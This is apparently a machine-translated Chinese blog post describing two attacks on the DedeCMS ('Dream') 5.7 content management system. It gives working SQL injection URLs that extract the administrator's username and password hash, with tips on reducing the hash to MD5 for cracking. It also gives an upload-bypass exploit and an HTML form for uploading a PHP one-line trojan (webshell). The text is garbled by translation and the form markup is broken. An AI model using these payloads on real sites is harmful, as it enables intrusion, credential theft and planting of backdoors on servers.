Dream 5.7 injection plus a leak
Category: Security | 2012-05-5 | 12,571 times
2 People talk about
Member Center query member Information Statement filtering is not strict, resulting in URL can be submitted injection parameters;
Member Center has upload action filtering is not strict, resulting in the upload loophole
Detailed Description:
① injection vulnerability.
This station http://www.webshell.cc/
First visit the "/data/admin/ver.txt" page to get the system last upgrade time,
Then access
"/member/ajax_membergroup.php?action=post&membergroup=1"
page, as shown in the figure illustrates the vulnerability.
and write the statement.
View Administrator Account
http://www.webshell.cc//member/ajax_membergroup.php?action=post&membergroup=@ ' '%20Union%20select%20userid %20from%20 '%23@__admin '%20where%201%20or%20id=@ '
Admin www.2cto.com
View Administrator Password
http://www.webshell.cc//member/ajax_membergroup.php?action=post&membergroup=@ ' '%20Union%20select%20pwd% 20from%20 '%23@__admin '%20where%201%20or%20id=@
8d29b1ef9f8c5a5af429
View Administrator Password
Get the 19-bit, remove the top three and the last one, get the admin's 16-bit MD5
8d2
9b1ef9f8c5a5af42
9
Cmd5 didn't solve it, so I had to test the second method.
② Upload Vulnerability:
Just log in to the Member center and then visit the page link
"/plus/carbuyaction.php?dopost=memclickout&oid=s-p0rn8888&rs[code]=." /dialog/select_soft_post "
As shown in the figure, the "/plus/carbuyaction.php" has successfully called the upload page "/dialog/select_soft_post"
So will php a word trojan extension to "RAR" and so on, using the submission page upload1.htm
<form action= =.. /dialog/select_soft_post]
<[/url ">http://www.webshell.cc/plus/carbuyaction.php?dopost=memclickout &oid=s-p0rn8888&rs[code]=.. /dialog/select_soft_post "method=" POST "
enctype=" Multipart/form-data "Name=" Form1 "
File:<input name= "UploadFile" type= "file"/><br>,
newname:<input name= "newname" text "type=" value=. PHP "/>
<button class=" Button2 "type=" submit "> Submit </button><br><br>
Site content is original, Reprint please be sure to keep the signature and link.
Dream 5.7 Injection plus a loophole: http://www.webshell.cc/3520.html